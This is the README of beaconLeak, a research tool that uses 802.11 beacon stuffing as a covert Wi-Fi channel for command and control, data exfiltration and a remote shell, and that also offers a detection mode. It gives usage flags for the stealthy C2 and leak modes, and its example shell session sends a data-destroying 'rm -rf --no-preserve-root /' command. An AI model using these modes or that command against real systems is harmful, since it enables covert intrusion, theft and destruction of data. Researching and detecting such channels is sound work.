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Covert data exfiltration and detection using 802.11 beacon stuffing

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beaconLeak v0.9.0

beaconLeak is an open source tool developed as a proof of concept of the beacon stuffing method as a covert channel. This channel allows command and control or data exfiltration using the wireless network card without association or authentication. beaconLeak includes the necessary functionality to both leak data as an attacker and detect the attack for defense purposes. Detection mode uses basic indicators of compromise and generate log entries to be consumed by monitoring or correlation security systems.

Description

The beacon stuffing attack is a wireless physical attack, so wireless proximity is required. Because of the need to push custom frames through the wireless interface, the tool must be run with either root privileges or network admin capabilities. Packet injection is a must for full functionality.
This tool uses Scapy to transmit the 802.11 (Dot11) frames, and pyNaCL to have all data encrypted on transit.

  • c2 mode: remote covert shell
  • leak mode: command channel and data exfiltration
  • detect mode: detect the use of this method (multiple tool detection)

Requirements

  • Root privileges
  • Python 3 with pip
  • Packet Injection capable Wireless NIC

Installation

These instructions are for Linux based systems only, other platforms are partially supported, please check for more info in the repository.

  1. Set up a Python virtual environment
# python -m venv bl
  1. Load Python virtual environment
# source bl/bin/activate
  1. Install the Python libraries dependencies to the virtual environment
(bl)# pip install -r requirements.txt
  1. ???
  2. Profit!

Usage

usage: beaconleak.py [-h] (--leak | --detect | --c2) [--pcap PCAP [PCAP ...]]
                     [--autohop] [--loglevel LOGLEVEL] [--covert] [--psk PSK]
                     [--ssid SSID] [--bssid BSSID] [--delay DELAY] [--debug]
                     iface

     _                       __            _
    | |_ ___ ___ ___ ___ ___|  |   ___ ___| |_
    | . | -_| .'|  _| . |   |  |__| -_| .'| '_|
    |___|___|__,|___|___|_|_|_____|___|__,|_,_|
                            by cjcase [v0.9.0]

    

positional arguments:
  iface                 Wireless interface in monitor mode

optional arguments:
  -h, --help            show this help message and exit
  --debug               Debug verbosity.

modes:
  --leak                (target) Leak data mode.
  --detect              (detect) Check surroundings for possible attacks
  --c2                  (attack) Command & control, remote shell

detect mode options:
  --pcap PCAP [PCAP ...]
                        pcap file(s) for offline beacon analysis
  --autohop             (Linux only) Automatic channel hopping
  --loglevel LOGLEVEL   log level, lowest is critical

c2 and leak mode options:
  --covert              Be extra sneaky by mimicking surrounding beacons
  --psk PSK             Custom encryption passphrase
  --ssid SSID           Emulated station WiFi name
  --bssid BSSID         Emulated station MAC address
  --delay DELAY         delay to sniff for command output response [default=5]

Examples

beaconLeak in detection mode

This mode will use your device's wireless radio in monitor mode to detect stuffed beacons in real time.

(bl)# python beaconleak.py --detect wlan0mon 

Optionally, you can analyze previous wireless packet captures to find stuffed beacons. e.g. you could sniff your wireless surroundings with Wireshark, save the captures to then analyze with beaconLeak. In this mode, the interface is still a required argument but ignored.

(bl)# python beaconleak.py --pcap cap1.pcap cap2.pcap cap3.pcap --detect lo0 

beaconLeak in C2 mode

This mode emulates a trivial shell, will allow you to communicate with any target that shares the same PSK, like the default built-in PSK.

(bl)# python beaconleak.py --c2 wlan0mon 

If you'd like to be more sneaky, you can toggle the covert mode, which will search for the noisiest beacon in your surroundings and mimimc it. You can also use your own PSK for encryption, but make sure the target is also started with this passphrase. beaconLeak will use pyNaCl's KDF to generate a strong key from this string.

(bl)# python beaconleak.py --covert --psk "secret sauce" --c2 wlan0mon

The covert channel is designed to be two-way, so it needs a delay in seconds where C2 mode will sniff packets to receive the target's output. This delay can be modified with the --delay flag. If you don't care about the output, instead of using a 0 delay, you can prepend your commands with the '!' character.

(bl)# python beaconleak.py --c2 wlan0mon

 _                       __            _
| |_ ___ ___ ___ ___ ___|  |   ___ ___| |_
| . | -_| .'|  _| . |   |  |__| -_| .'| '_|
|___|___|__,|___|___|_|_|_____|___|__,|_,_|
                        by cjcase [v0.9.0]


[*] Using interface wlan0mon, type '!help' for usage, use Ctrl+C to exit
[beaconshell] >>> !rm -rf --no-preserve-root /

beaconLeak in leak mode (victim simulation)

By default this mode will not generate any output, you can use debug mode to check what is happening.

(bl)# python beaconleak.py --leak wlan0mon 

Debug Mode

All modes have an extra flag to toggle verbosity, this will let you see more of what is happening, it's also useful to us if you find a bug and submit the issue with output from the this mode.

(bl)# python beaconleak.py --leak --debug wlan0mon 

Collaboration

Have an idea for a cool new feature? want to help fix an issue or optimize how this tool works? Please submit a pull request!

License

GNU GLPv3

Acknowledgements

This tool was inspired by the "bridging the airgap" research work by Mordecai Guri, et. al. A previous description of the beacon stuffing method for exfiltration was described by Tom Neaves in his Trustwave Spider Labs blog post about his tool "Smuggler". PyExfil by Yuval Nativ has a basic implementation of this method that predates our tool, its method has been added to our detection functionality.

This project was developed as a research project for Tallinn University of Technology's Cyber Security Master programme and funded by the Dora Plus fund.

Dora Plus

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